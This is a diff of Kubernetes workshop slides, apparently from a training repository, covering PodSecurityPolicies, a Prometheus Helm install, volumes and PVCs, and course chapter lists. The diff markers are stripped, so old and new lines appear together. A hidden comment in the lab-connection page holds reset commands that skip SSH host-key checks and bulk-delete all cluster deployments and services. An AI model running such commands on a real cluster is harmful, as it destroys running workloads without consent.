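apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: restricted
spec:
  privileged: false
  hostNetwork: false
  hostIPC: false
  hostPID: false
  runAsUser:
    rule: RunAsAny
  seLinux:
    rule: RunAsAny
  supplementalGroups:
    rule: RunAsAny
  fsGroup:
    rule: RunAsAny
  volumes:
    - configMap
    - downwardAPI
    - emptyDir
    - persistentVolumeClaim
    - projected
    - secret
```

(Note that `hostPath` is absent from the allowed `volumes`, and there is no `requiredDropCapabilities` list.)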
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## The case of static pods
|
||||
|
||||
- If we list the pods in the `kube-system` namespace, `kube-apiserver` is missing
|
||||
|
||||
- However, the API server is obviously running
|
||||
|
||||
(otherwise, `kubectl get pods --namespace=kube-system` wouldn't work)
|
||||
|
||||
- The API server Pod is created directly by kubelet
|
||||
|
||||
(without going through the PSP admission plugin)
|
||||
|
||||
- Then, kubelet creates a "mirror pod" representing that Pod in etcd
|
||||
|
||||
- That "mirror pod" creation goes through the PSP admission plugin
|
||||
|
||||
- And it gets blocked!
|
||||
|
||||
- This can be fixed by binding `psp:privileged` to group `system:nodes`
|
||||
|
||||
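For example (the binding name is arbitrary):

```bash
kubectl create clusterrolebinding psp:privileged:nodes \
        --clusterrole=psp:privileged --group=system:nodes
```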
---
|
||||
|
||||
## .warning[Before moving on...]
|
||||
|
||||
- Our cluster is currently broken
|
||||
|
||||
(we can't create pods in kube-system, default, ...)
|
||||
|
||||
- We need to either:
|
||||
|
||||
- disable the PSP admission plugin
|
||||
|
||||
- allow use of the PSPs by the relevant users and groups
|
||||
|
||||
- For instance, we could:
|
||||
|
||||
- bind `psp:restricted` to the group `system:authenticated`
|
||||
|
||||
- bind `psp:privileged` to the ServiceAccount `kube-system:default`
|
||||
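For example, with commands along these lines (the binding names are arbitrary):

```bash
kubectl create clusterrolebinding psp:restricted:authenticated \
        --clusterrole=psp:restricted --group=system:authenticated
kubectl create rolebinding psp:privileged:kube-system-default \
        --namespace=kube-system --clusterrole=psp:privileged \
        --serviceaccount=kube-system:default
```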
@@ -12,7 +12,7 @@
|
||||
|
||||
- an *alert manager* to notify us according to metrics values or trends
|
||||
|
||||
- We are going to deploy it on our Kubernetes cluster and see how to query it
|
||||
- We are going to use it to collect and query some metrics on our Kubernetes cluster
|
||||
|
||||
---
|
||||
|
||||
@@ -145,7 +145,28 @@ scrape_configs:
|
||||
|
||||
(it will even be gentler on the I/O subsystem since it needs to write less)
|
||||
|
||||
[Storage in Prometheus 2.0](https://www.youtube.com/watch?v=C4YV-9CrawA) by [Goutham V](https://twitter.com/putadent) at DC17EU
|
||||
- Would you like to know more? Check this video:
|
||||
|
||||
[Storage in Prometheus 2.0](https://www.youtube.com/watch?v=C4YV-9CrawA) by [Goutham V](https://twitter.com/putadent) at DC17EU
|
||||
|
||||
---
|
||||
|
||||
## Checking if Prometheus is installed
|
||||
|
||||
- Before trying to install Prometheus, let's check if it's already there
|
||||
|
||||
.exercise[
|
||||
|
||||
- Look for services with a label `app=prometheus` across all namespaces:
|
||||
```bash
|
||||
kubectl get services --selector=app=prometheus --all-namespaces
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
If we see a `NodePort` service called `prometheus-server`, we're good!
|
||||
|
||||
(We can then skip to "Connecting to the Prometheus web UI".)
|
||||
|
||||
---
|
||||
|
||||
@@ -169,11 +190,11 @@ We need to:
|
||||
|
||||
---
|
||||
|
||||
## Helm Charts to the rescue
|
||||
## Helm charts to the rescue
|
||||
|
||||
- To make our lives easier, we are going to use a Helm Chart
|
||||
- To make our lives easier, we are going to use a Helm chart
|
||||
|
||||
- The Helm Chart will take care of all the steps explained above
|
||||
- The Helm chart will take care of all the steps explained above
|
||||
|
||||
(including some extra features that we don't need, but won't hurt)
|
||||
|
||||
@@ -210,20 +231,41 @@ We need to:
|
||||
|
||||
- Install Prometheus on our cluster:
|
||||
```bash
|
||||
helm install stable/prometheus \
|
||||
--set server.service.type=NodePort \
|
||||
--set server.persistentVolume.enabled=false
|
||||
helm upgrade prometheus stable/prometheus \
|
||||
--install \
|
||||
--namespace kube-system \
|
||||
--set server.service.type=NodePort \
|
||||
--set server.service.nodePort=30090 \
|
||||
--set server.persistentVolume.enabled=false \
|
||||
--set alertmanager.enabled=false
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The provided flags:
|
||||
Curious about all these flags? They're explained in the next slide.
|
||||
|
||||
- expose the server web UI (and API) on a NodePort
|
||||
---
|
||||
|
||||
- use an ephemeral volume for metrics storage
|
||||
<br/>
|
||||
(instead of requesting a Persistent Volume through a Persistent Volume Claim)
|
||||
class: extra-details
|
||||
|
||||
## Explaining all the Helm flags
|
||||
|
||||
- `helm upgrade prometheus` → upgrade release "prometheus" to the latest version ...
|
||||
|
||||
(a "release" is a unique name given to an app deployed with Helm)
|
||||
|
||||
- `stable/prometheus` → ... of the chart `prometheus` in repo `stable`
|
||||
|
||||
- `--install` → if the app doesn't exist, create it
|
||||
|
||||
- `--namespace kube-system` → put it in that specific namespace
|
||||
|
||||
- And set the following *values* when rendering the chart's templates:
|
||||
|
||||
- `server.service.type=NodePort` → expose the Prometheus server with a NodePort
|
||||
- `server.service.nodePort=30090` → set the specific NodePort number to use
|
||||
- `server.persistentVolume.enabled=false` → do not use a PersistentVolumeClaim
|
||||
- `alertmanager.enabled=false` → disable the alert manager entirely
|
||||
|
||||
---
|
||||
|
||||
@@ -235,7 +277,7 @@ The provided flags:
|
||||
|
||||
- Figure out the NodePort that was allocated to the Prometheus server:
|
||||
```bash
|
||||
kubectl get svc | grep prometheus-server
|
||||
kubectl get svc --all-namespaces | grep prometheus-server
|
||||
```
|
||||
|
||||
- With your browser, connect to that port
|
||||
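If we used the flags shown earlier, that port should be 30090. We can also extract it with a one-liner like this (assuming the service is `prometheus-server` in `kube-system`):

```bash
kubectl -n kube-system get svc prometheus-server \
        -o 'jsonpath={.spec.ports[0].nodePort}'
```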
@@ -292,7 +334,7 @@ This query will show us CPU usage across all containers:
|
||||
container_cpu_usage_seconds_total
|
||||
```
|
||||
|
||||
- The suffix of the metrics name tells us:
|
||||
- The suffix of the metrics name tells us:
|
||||
|
||||
- the unit (seconds of CPU)
|
||||
|
||||
@@ -486,3 +528,21 @@ class: extra-details
|
||||
- see [this comment](https://github.com/prometheus/prometheus/issues/2204#issuecomment-261515520) for an overview
|
||||
|
||||
- or [this blog post](https://5pi.de/2017/11/09/use-prometheus-vector-matching-to-get-kubernetes-utilization-across-any-pod-label/) for a complete description of the process
|
||||
|
||||
---
|
||||
|
||||
## In practice
|
||||
|
||||
- Grafana is a beautiful (and useful) frontend to display all kinds of graphs
|
||||
|
||||
- Not everyone needs to know Prometheus, PromQL, Grafana, etc.
|
||||
|
||||
- But in a team, it is valuable to have at least one person who knows them
|
||||
|
||||
- That person can set up queries and dashboards for the rest of the team
|
||||
|
||||
- It's a little bit like knowing how to optimize SQL queries, Dockerfiles ...
|
||||
|
||||
Don't panic if you don't know these tools!
|
||||
|
||||
... But make sure at least one person in your team is on it 💯
|
||||
|
||||
@@ -34,13 +34,13 @@
|
||||
|
||||
- Each pod can discover the IP address of the others easily
|
||||
|
||||
- The pods can have persistent volumes attached to them
|
||||
- The pods can persist data on attached volumes
|
||||
|
||||
🤔 Wait a minute ... Can't we already attach volumes to pods and deployments?
|
||||
|
||||
---
|
||||
|
||||
## Volumes and Persistent Volumes
|
||||
## Revisiting volumes
|
||||
|
||||
- [Volumes](https://kubernetes.io/docs/concepts/storage/volumes/) are used for many purposes:
|
||||
|
||||
@@ -50,13 +50,13 @@
|
||||
|
||||
- accessing storage systems
|
||||
|
||||
- The last type of volumes is known as a "Persistent Volume"
|
||||
- Let's see examples of the latter usage
|
||||
|
||||
---
|
||||
|
||||
## Persistent Volumes types
|
||||
## Volumes types
|
||||
|
||||
- There are many [types of Persistent Volumes](https://kubernetes.io/docs/concepts/storage/persistent-volumes/#types-of-persistent-volumes) available:
|
||||
- There are many [types of volumes](https://kubernetes.io/docs/concepts/storage/volumes/#types-of-volumes) available:
|
||||
|
||||
- public cloud storage (GCEPersistentDisk, AWSElasticBlockStore, AzureDisk...)
|
||||
|
||||
@@ -74,7 +74,7 @@
|
||||
|
||||
---
|
||||
|
||||
## Using a Persistent Volume
|
||||
## Using a cloud volume
|
||||
|
||||
Here is a pod definition using an AWS EBS volume (that has to be created first):
|
||||
|
||||
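The key part of that definition is the volume declaration, which looks roughly like this (the volume ID is a placeholder):

```yaml
  volumes:
    - name: my-ebs-volume
      awsElasticBlockStore:
        volumeID: vol-0123456789abcdef0
        fsType: ext4
```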
@@ -99,7 +99,32 @@ spec:
|
||||
|
||||
---
|
||||
|
||||
## Shortcomings of Persistent Volumes
|
||||
## Using an NFS volume
|
||||
|
||||
Here is another example using a volume on an NFS server:
|
||||
|
||||
```yaml
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: pod-using-my-nfs-volume
|
||||
spec:
|
||||
containers:
|
||||
- image: ...
|
||||
name: container-using-my-nfs-volume
|
||||
volumeMounts:
|
||||
- mountPath: /my-nfs
|
||||
name: my-nfs-volume
|
||||
volumes:
|
||||
- name: my-nfs-volume
|
||||
nfs:
|
||||
server: 192.168.0.55
|
||||
path: "/exports/assets"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Shortcomings of volumes
|
||||
|
||||
- Their lifecycle (creation, deletion...) is managed outside of the Kubernetes API
|
||||
|
||||
@@ -125,17 +150,47 @@ spec:
|
||||
|
||||
- This type is a *Persistent Volume Claim*
|
||||
|
||||
- A Persistent Volume Claim (PVC) is a resource type
|
||||
|
||||
(visible with `kubectl get persistentvolumeclaims` or `kubectl get pvc`)
|
||||
|
||||
- A PVC is not a volume; it is a *request for a volume*
|
||||
|
||||
---
|
||||
|
||||
## Persistent Volume Claims in practice
|
||||
|
||||
- Using a Persistent Volume Claim is a two-step process:
|
||||
|
||||
- creating the claim
|
||||
|
||||
- using the claim in a pod (as if it were any other kind of volume)
|
||||
|
||||
- Between these two steps, something will happen behind the scenes:
|
||||
- A PVC starts by being Unbound (without an associated volume)
|
||||
|
||||
- Kubernetes will associate an existing volume with the claim
|
||||
- Once it is associated with a Persistent Volume, it becomes Bound
|
||||
|
||||
- ... or dynamically create a volume if possible and necessary
|
||||
- A Pod referring to an unbound PVC will not start
|
||||
|
||||
(but as soon as the PVC is bound, the Pod can start)
|
||||
|
||||
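Here is what a minimal claim could look like (name and size are just examples):

```yaml
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: my-claim
spec:
  accessModes:
    - ReadWriteOnce
  resources:
    requests:
      storage: 1Gi
```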
---
|
||||
|
||||
## Binding PV and PVC
|
||||
|
||||
- A Kubernetes controller continuously watches PV and PVC objects
|
||||
|
||||
- When it notices an unbound PVC, it tries to find a satisfactory PV
|
||||
|
||||
("satisfactory" in terms of size and other characteristics; see next slide)
|
||||
|
||||
- If no PV fits the PVC, a PV can be created dynamically
|
||||
|
||||
(this requires configuring a *dynamic provisioner*; more on that later)
|
||||
|
||||
- Otherwise, the PVC remains unbound indefinitely
|
||||
|
||||
(until we manually create a PV or set up dynamic provisioning)
|
||||
|
||||
---
|
||||
|
||||
@@ -147,7 +202,9 @@ spec:
|
||||
|
||||
- the access mode (e.g. "read-write by a single pod")
|
||||
|
||||
- It can also give extra details, like:
|
||||
- Optionally, it can also specify a Storage Class
|
||||
|
||||
- The Storage Class indicates:
|
||||
|
||||
- which storage system to use (e.g. Portworx, EBS...)
|
||||
|
||||
@@ -155,8 +212,6 @@ spec:
|
||||
|
||||
e.g.: "replicate the data 3 times, and use SSD media"
|
||||
|
||||
- The extra details are provided by specifying a Storage Class
|
||||
|
||||
---
|
||||
|
||||
## What's a Storage Class?
|
||||
@@ -167,15 +222,15 @@ spec:
|
||||
|
||||
- It indicates which *provisioner* to use
|
||||
|
||||
(which controller will create the actual volume)
|
||||
|
||||
- And arbitrary parameters for that provisioner
|
||||
|
||||
(replication levels, type of disk ... anything relevant!)
|
||||
|
||||
- It is necessary to define a Storage Class to use [dynamic provisioning](https://kubernetes.io/docs/concepts/storage/dynamic-provisioning/)
|
||||
- Storage Classes are required if we want to use [dynamic provisioning](https://kubernetes.io/docs/concepts/storage/dynamic-provisioning/)
|
||||
|
||||
- Conversely, it is not necessary to define one if you will create volumes manually
|
||||
|
||||
(we will see dynamic provisioning in action later)
|
||||
(but we can also create volumes manually, and ignore Storage Classes)
|
||||
|
||||
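For instance, a Storage Class using the AWS EBS provisioner could look like this (a sketch; the parameters depend entirely on the provisioner):

```yaml
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: fast
provisioner: kubernetes.io/aws-ebs
parameters:
  type: gp2
```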
---
|
||||
|
||||
@@ -200,7 +255,7 @@ spec:
|
||||
|
||||
## Using a Persistent Volume Claim
|
||||
|
||||
Here is the same definition as earlier, but using a PVC:
|
||||
Here is a Pod definition like the ones shown earlier, but using a PVC:
|
||||
|
||||
```yaml
|
||||
apiVersion: v1
|
||||
@@ -212,7 +267,7 @@ spec:
|
||||
- image: ...
|
||||
name: container-using-a-claim
|
||||
volumeMounts:
|
||||
- mountPath: /my-ebs
|
||||
- mountPath: /my-vol
|
||||
name: my-volume
|
||||
volumes:
|
||||
- name: my-volume
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
## Versions installed
|
||||
|
||||
- Kubernetes 1.14.1
|
||||
- Docker Engine 18.09.5
|
||||
- Kubernetes 1.14.2
|
||||
- Docker Engine 18.09.6
|
||||
- Docker Compose 1.21.1
|
||||
|
||||
<!-- ##VERSION## -->
|
||||
|
||||
@@ -18,6 +18,8 @@
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Kubernetes volumes vs. Docker volumes
|
||||
|
||||
- Kubernetes and Docker volumes are very similar
|
||||
@@ -35,13 +37,35 @@
|
||||
- Kubernetes volumes are also used to expose configuration and secrets
|
||||
|
||||
- Docker has specific concepts for configuration and secrets
|
||||
|
||||
<br/>
|
||||
(but under the hood, the technical implementation is similar)
|
||||
|
||||
- If you're not familiar with Docker volumes, you can safely ignore this slide!
|
||||
|
||||
---
|
||||
|
||||
## Volumes ≠ Persistent Volumes
|
||||
|
||||
- Volumes and Persistent Volumes are related, but very different!
|
||||
|
||||
- *Volumes*:
|
||||
|
||||
- appear in Pod specifications (see next slide)
|
||||
|
||||
- do not exist as API resources (**cannot** do `kubectl get volumes`)
|
||||
|
||||
- *Persistent Volumes*:
|
||||
|
||||
- are API resources (**can** do `kubectl get persistentvolumes`)
|
||||
|
||||
- correspond to concrete volumes (e.g. on a SAN, EBS, etc.)
|
||||
|
||||
- cannot be associated to a Pod directly; but through a Persistent Volume Claim
|
||||
|
||||
- won't be discussed further in this section
|
||||
|
||||
---
|
||||
|
||||
## A simple volume example
|
||||
|
||||
```yaml
|
||||
|
||||
@@ -132,6 +132,8 @@ And *then* it is time to look at orchestration!
|
||||
|
|
||||
[Persistent Volumes](kube-selfpaced.yml.html#toc-highly-available-persistent-volumes)
|
||||
|
||||
- Excellent [blog post](http://www.databasesoup.com/2018/07/should-i-run-postgres-on-kubernetes.html) tackling the question: “Should I run Postgres on Kubernetes?”
|
||||
|
||||
---
|
||||
|
||||
## HTTP traffic handling
|
||||
|
||||
@@ -20,54 +20,58 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- k8s/versions-k8s.md
|
||||
- shared/sampleapp.md
|
||||
# - shared/composescale.md
|
||||
# - shared/hastyconclusions.md
|
||||
#- shared/composescale.md
|
||||
#- shared/hastyconclusions.md
|
||||
- shared/composedown.md
|
||||
- k8s/concepts-k8s.md
|
||||
- shared/declarative.md
|
||||
- k8s/declarative.md
|
||||
- - k8s/kubenet.md
|
||||
- k8s/kubectlget.md
|
||||
- k8s/kubenet.md
|
||||
- - k8s/kubectlget.md
|
||||
- k8s/setup-k8s.md
|
||||
- k8s/kubectlrun.md
|
||||
- k8s/deploymentslideshow.md
|
||||
- k8s/kubectlexpose.md
|
||||
- - k8s/shippingimages.md
|
||||
# - k8s/buildshiprun-selfhosted.md
|
||||
#- k8s/buildshiprun-selfhosted.md
|
||||
- k8s/buildshiprun-dockerhub.md
|
||||
- k8s/ourapponkube.md
|
||||
# - k8s/kubectlproxy.md
|
||||
# - k8s/localkubeconfig.md
|
||||
# - k8s/accessinternal.md
|
||||
#- k8s/kubectlproxy.md
|
||||
#- k8s/localkubeconfig.md
|
||||
#- k8s/accessinternal.md
|
||||
- k8s/dashboard.md
|
||||
# - k8s/kubectlscale.md
|
||||
#- k8s/kubectlscale.md
|
||||
- k8s/scalingdockercoins.md
|
||||
- shared/hastyconclusions.md
|
||||
- k8s/daemonset.md
|
||||
- - k8s/rollout.md
|
||||
# - k8s/healthchecks.md
|
||||
- k8s/namespaces.md
|
||||
#- k8s/kustomize.md
|
||||
#- k8s/helm.md
|
||||
#- k8s/create-chart.md
|
||||
#- k8s/healthchecks.md
|
||||
- k8s/logs-cli.md
|
||||
- k8s/logs-centralized.md
|
||||
#- - k8s/helm.md
|
||||
# - k8s/create-chart.md
|
||||
# - k8s/kustomize.md
|
||||
# - k8s/namespaces.md
|
||||
# - k8s/netpol.md
|
||||
# - k8s/authn-authz.md
|
||||
# - k8s/csr-api.md
|
||||
#- - k8s/ingress.md
|
||||
# - k8s/gitworkflows.md
|
||||
#- k8s/netpol.md
|
||||
#- k8s/authn-authz.md
|
||||
#- k8s/csr-api.md
|
||||
#- k8s/podsecuritypolicy.md
|
||||
#- k8s/ingress.md
|
||||
#- k8s/gitworkflows.md
|
||||
- k8s/prometheus.md
|
||||
#- - k8s/volumes.md
|
||||
# - k8s/build-with-docker.md
|
||||
# - k8s/build-with-kaniko.md
|
||||
# - k8s/configuration.md
|
||||
#- - k8s/owners-and-dependents.md
|
||||
# - k8s/extending-api.md
|
||||
# - k8s/statefulsets.md
|
||||
# - k8s/portworx.md
|
||||
#- k8s/volumes.md
|
||||
#- k8s/build-with-docker.md
|
||||
#- k8s/build-with-kaniko.md
|
||||
#- k8s/configuration.md
|
||||
#- k8s/owners-and-dependents.md
|
||||
#- k8s/extending-api.md
|
||||
#- k8s/statefulsets.md
|
||||
#- k8s/local-persistent-volumes.md
|
||||
#- k8s/portworx.md
|
||||
#- k8s/staticpods.md
|
||||
- - k8s/whatsnext.md
|
||||
- k8s/links.md
|
||||
- shared/thankyou.md
|
||||
|
||||
@@ -22,6 +22,7 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- k8s/versions-k8s.md
|
||||
- shared/sampleapp.md
|
||||
# Bridget doesn't go into as much depth with compose
|
||||
@@ -53,10 +54,10 @@ chapters:
|
||||
- - k8s/logs-cli.md
|
||||
# Bridget hasn't added EFK yet
|
||||
#- k8s/logs-centralized.md
|
||||
- k8s/namespaces.md
|
||||
- k8s/helm.md
|
||||
- k8s/create-chart.md
|
||||
#- k8s/kustomize.md
|
||||
- k8s/namespaces.md
|
||||
#- k8s/netpol.md
|
||||
- k8s/whatsnext.md
|
||||
# - k8s/links.md
|
||||
|
||||
@@ -20,6 +20,7 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- k8s/versions-k8s.md
|
||||
- shared/sampleapp.md
|
||||
- shared/composescale.md
|
||||
@@ -46,17 +47,18 @@ chapters:
|
||||
# - k8s/scalingdockercoins.md
|
||||
# - shared/hastyconclusions.md
|
||||
- k8s/daemonset.md
|
||||
- - k8s/rollout.md
|
||||
- k8s/rollout.md
|
||||
- - k8s/namespaces.md
|
||||
- k8s/kustomize.md
|
||||
- k8s/helm.md
|
||||
- k8s/create-chart.md
|
||||
- k8s/healthchecks.md
|
||||
- k8s/logs-cli.md
|
||||
- k8s/logs-centralized.md
|
||||
- - k8s/helm.md
|
||||
#- k8s/create-chart.md
|
||||
- k8s/kustomize.md
|
||||
- k8s/namespaces.md
|
||||
- k8s/netpol.md
|
||||
- k8s/authn-authz.md
|
||||
- k8s/csr-api.md
|
||||
- k8s/podsecuritypolicy.md
|
||||
- - k8s/ingress.md
|
||||
- k8s/gitworkflows.md
|
||||
- k8s/prometheus.md
|
||||
@@ -67,6 +69,7 @@ chapters:
|
||||
- - k8s/owners-and-dependents.md
|
||||
- k8s/extending-api.md
|
||||
- k8s/statefulsets.md
|
||||
- k8s/local-persistent-volumes.md
|
||||
- k8s/portworx.md
|
||||
- k8s/staticpods.md
|
||||
- - k8s/whatsnext.md
|
||||
|
||||
@@ -20,6 +20,7 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- k8s/versions-k8s.md
|
||||
- shared/sampleapp.md
|
||||
#- shared/composescale.md
|
||||
@@ -28,8 +29,8 @@ chapters:
|
||||
- k8s/concepts-k8s.md
|
||||
- shared/declarative.md
|
||||
- k8s/declarative.md
|
||||
- - k8s/kubenet.md
|
||||
- k8s/kubectlget.md
|
||||
- k8s/kubenet.md
|
||||
- - k8s/kubectlget.md
|
||||
- k8s/setup-k8s.md
|
||||
- k8s/kubectlrun.md
|
||||
- k8s/deploymentslideshow.md
|
||||
@@ -47,16 +48,17 @@ chapters:
|
||||
- shared/hastyconclusions.md
|
||||
- - k8s/daemonset.md
|
||||
- k8s/rollout.md
|
||||
- k8s/healthchecks.md
|
||||
- k8s/namespaces.md
|
||||
- k8s/kustomize.md
|
||||
#- k8s/helm.md
|
||||
#- k8s/create-chart.md
|
||||
- - k8s/healthchecks.md
|
||||
- k8s/logs-cli.md
|
||||
- k8s/logs-centralized.md
|
||||
- - k8s/helm.md
|
||||
#- k8s/create-chart.md
|
||||
- k8s/kustomize.md
|
||||
- k8s/namespaces.md
|
||||
- k8s/netpol.md
|
||||
#- k8s/netpol.md
|
||||
- k8s/authn-authz.md
|
||||
- k8s/csr-api.md
|
||||
- k8s/podsecuritypolicy.md
|
||||
- - k8s/ingress.md
|
||||
#- k8s/gitworkflows.md
|
||||
- k8s/prometheus.md
|
||||
@@ -65,10 +67,11 @@ chapters:
|
||||
#- k8s/build-with-kaniko.md
|
||||
- k8s/configuration.md
|
||||
#- k8s/owners-and-dependents.md
|
||||
- k8s/extending-api.md
|
||||
#- k8s/extending-api.md
|
||||
- - k8s/statefulsets.md
|
||||
- k8s/local-persistent-volumes.md
|
||||
- k8s/portworx.md
|
||||
- k8s/staticpods.md
|
||||
#- k8s/staticpods.md
|
||||
- - k8s/whatsnext.md
|
||||
- k8s/links.md
|
||||
- shared/thankyou.md
|
||||
|
||||
137
slides/shared/connecting.md
Normal file
137
slides/shared/connecting.md
Normal file
@@ -0,0 +1,137 @@
|
||||
class: in-person
|
||||
|
||||
## Connecting to our lab environment
|
||||
|
||||
.exercise[
|
||||
|
||||
- Log into the first VM (`node1`) with your SSH client
|
||||
|
||||
<!--
|
||||
```bash
|
||||
for N in $(awk '/\Wnode/{print $2}' /etc/hosts); do
|
||||
ssh -o StrictHostKeyChecking=no $N true
|
||||
done
|
||||
```
|
||||
|
||||
```bash
|
||||
if which kubectl; then
|
||||
kubectl get deploy,ds -o name | xargs -rn1 kubectl delete
|
||||
kubectl get all -o name | grep -v service/kubernetes | xargs -rn1 kubectl delete --ignore-not-found=true
|
||||
kubectl -n kube-system get deploy,svc -o name | grep -v dns | xargs -rn1 kubectl -n kube-system delete
|
||||
fi
|
||||
```
|
||||
-->
|
||||
|
||||
- Check that you can SSH (without password) to `node2`:
|
||||
```bash
|
||||
ssh node2
|
||||
```
|
||||
- Type `exit` or `^D` to come back to `node1`
|
||||
|
||||
<!-- ```bash exit``` -->
|
||||
|
||||
]
|
||||
|
||||
If anything goes wrong — ask for help!
|
||||
|
||||
---
|
||||
|
||||
## Doing or re-doing the workshop on your own?
|
||||
|
||||
- Use something like
|
||||
[Play-With-Docker](http://play-with-docker.com/) or
|
||||
[Play-With-Kubernetes](https://training.play-with-kubernetes.com/)
|
||||
|
||||
Zero setup effort; but environments are short-lived and
|
||||
might have limited resources
|
||||
|
||||
- Create your own cluster (local or cloud VMs)
|
||||
|
||||
Small setup effort; small cost; flexible environments
|
||||
|
||||
- Create a bunch of clusters for you and your friends
|
||||
([instructions](https://@@GITREPO@@/tree/master/prepare-vms))
|
||||
|
||||
Bigger setup effort; ideal for group training
|
||||
|
||||
---
|
||||
|
||||
class: self-paced
|
||||
|
||||
## Get your own Docker nodes
|
||||
|
||||
- If you already have some Docker nodes: great!
|
||||
|
||||
- If not: let's get some, thanks to Play-With-Docker
|
||||
|
||||
.exercise[
|
||||
|
||||
- Go to http://www.play-with-docker.com/
|
||||
|
||||
- Log in
|
||||
|
||||
- Create your first node
|
||||
|
||||
<!-- ```open http://www.play-with-docker.com/``` -->
|
||||
|
||||
]
|
||||
|
||||
You will need a Docker ID to use Play-With-Docker.
|
||||
|
||||
(Creating a Docker ID is free.)
|
||||
|
||||
---
|
||||
|
||||
## We will (mostly) interact with node1 only
|
||||
|
||||
*These remarks apply only when using multiple nodes, of course.*
|
||||
|
||||
- Unless instructed, **all commands must be run from the first VM, `node1`**
|
||||
|
||||
- We will only check out / copy the code on `node1`
|
||||
|
||||
- During normal operations, we do not need access to the other nodes
|
||||
|
||||
- If we had to troubleshoot issues, we would use a combination of:
|
||||
|
||||
- SSH (to access system logs, daemon status...)
|
||||
|
||||
- Docker API (to check running containers and container engine status)
|
||||
|
||||
---
|
||||
|
||||
## Terminals
|
||||
|
||||
Once in a while, the instructions will say:
|
||||
<br/>"Open a new terminal."
|
||||
|
||||
There are multiple ways to do this:
|
||||
|
||||
- create a new window or tab on your machine, and SSH into the VM;
|
||||
|
||||
- use screen or tmux on the VM and open a new window from there.
|
||||
|
||||
You are welcome to use the method that you feel the most comfortable with.
|
||||
|
||||
---
|
||||
|
||||
## Tmux cheatsheet
|
||||
|
||||
[Tmux](https://en.wikipedia.org/wiki/Tmux) is a terminal multiplexer like `screen`.
|
||||
|
||||
*You don't have to use it or even know about it to follow along.
|
||||
<br/>
|
||||
But some of us like to use it to switch between terminals.
|
||||
<br/>
|
||||
It has been preinstalled on your workshop nodes.*
|
||||
|
||||
- Ctrl-b c → creates a new window
|
||||
- Ctrl-b n → go to next window
|
||||
- Ctrl-b p → go to previous window
|
||||
- Ctrl-b " → split window top/bottom
|
||||
- Ctrl-b % → split window left/right
|
||||
- Ctrl-b Alt-1 → rearrange windows in columns
|
||||
- Ctrl-b Alt-2 → rearrange windows in rows
|
||||
- Ctrl-b arrows → navigate to other windows
|
||||
- Ctrl-b d → detach session
|
||||
- tmux attach → reattach to session
|
||||
@@ -169,143 +169,3 @@ class: in-person, extra-details
|
||||
- It requires UDP ports to be open
|
||||
|
||||
(By default, it uses a UDP port between 60000 and 61000)
|
||||
|
||||
@@ -24,6 +24,7 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- swarm/versions.md
|
||||
- shared/sampleapp.md
|
||||
- shared/composescale.md
|
||||
|
||||
@@ -24,6 +24,7 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- swarm/versions.md
|
||||
- shared/sampleapp.md
|
||||
- shared/composescale.md
|
||||
|
||||
@@ -19,6 +19,7 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- swarm/versions.md
|
||||
- |
|
||||
name: part-1
|
||||
|
||||
@@ -19,6 +19,7 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- swarm/versions.md
|
||||
- |
|
||||
name: part-1
|
||||
|
||||